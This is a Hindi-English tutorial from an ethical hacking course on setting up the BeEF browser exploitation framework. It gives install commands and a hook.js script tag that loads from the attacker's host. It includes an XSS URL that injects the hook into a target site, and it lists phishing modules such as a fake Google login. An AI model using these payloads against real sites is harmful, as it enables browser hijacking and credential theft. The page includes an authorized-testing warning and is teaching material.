Termux Learn - Ethical Hacking in Hindi | Free Mobile Hacking Course

🌐 BeEF क्या है?

BeEF (Browser Exploitation Framework) एक powerful tool है जो web browser-based attacks perform करने में use होता है। यह victim के browser पर hook inject करके control प्राप्त करता है और client-side vulnerabilities exploit करता है।

👉 यह web application security testing में सबसे advanced tool है जो browser पर focus करता है।

🎯 BeEF क्या-क्या कर सकता है

Browser Hooking

Victim browser पर hook inject करना

Client Info

Browser और system info collect करना

Browser Exploits

Browser vulnerabilities exploit करना

Phishing Setup

Fake pages create करना

Command Execution

Browser से commands run करना

Security Testing

XSS और CSRF test करना

⚙️ Kali NetHunter / Termux में BeEF install

aptInstallation Commands

System Update

apt update

Install Required Packages

apt install beef-xss

Install Ruby Gems (if needed)

apt install rubygems

Install SQLite (database)

apt install sqlite3

💻 Basic Commands (Use)

👉 BeEF start करने के लिए commands use करो:

Start BeEF Server

beef-xss

Start with Custom Port

beef-xss -p 3000

Start with Custom IP

beef-xss -x 192.168.1.5

Check BeEF Status

systemctl status beef-xss

🎯 Real Example (Practical समझ)

Lab Setup📝 BeEF Hook Setup Process

1. BeEF Server Start करो

beef-xss

👉 Output में URL दिखेगा:

http://127.0.0.1:3000/ui/panel

UI Panel URL (यह पर control panel open होगा)

2. Hook Script URL Copy करो

http://192.168.1.5:3000/hook.js

3. Hook Code Sample (HTML में insert करो)

<script src="http://192.168.1.5:3000/hook.js"></script>

📊 Output समझो (BeEF Dashboard)

[*] BeEF is loading. Wait for UI to render at http://127.0.0.1:3000/ui/panel

[+] Hook URL: http://192.168.1.5:3000/hook.js

[+] BeEF server is listening on port 3000

[*] UI Username: beef

[*] UI Password: beef

🧠 Dashboard में क्या दिखेगा:

Hooked Browsers

Online Browsers

Victim browser की list दिखेगी

Browser Info

Victim Details

OS, Browser version, IP address

Command Modules

Available Commands

Different exploits और attacks

Logs

Activity Log

सब actions का record

👉 Popular modules use कर सकते हो:

• Get Browser Details - Full info देखो

• Fake Flash Update - Phishing attack

• Clippy - Funny messages show

• Pretty Theft - Phishing modal

• Google Phishing - Fake Google login

• Alert Dialog - Popups show

🔥 XSS से Hook करना

XSS Vulnerable URL

http://target-site.com/search?q=<script src="http://192.168.1.5:3000/hook.js"></script>

Reflected XSS

URL पर inject

Victim link click करे

Stored XSS

Database में save

Auto hook हो जाता है

👉 जैसे ही victim page open करेगा, BeEF panel में उसका browser दिखने लगेगा

⚠️ Important Warning

BeEF का unauthorized use गैरकानूनी हो सकता है

केवल authorized testing में use करो:

अपना lab environment (Vulnerable apps)
Pentest permission वाले websites
Educational labs (DVWA, bWAPP)

⚠️ XSS और browser-based attacks को understand करना important है लेकिन बिना permission में use करना cyber crime है!

🧩 Related Tools

Metasploit

Full exploitation framework

Burp Suite

Web application testing

💡 Simple समझ

BeEF = "Browser पर Remote Control"

Victim का browser hook करो, और control panel से उसके browser में कुछ भी कर सकते हो — popups show, info steal, phishing page open.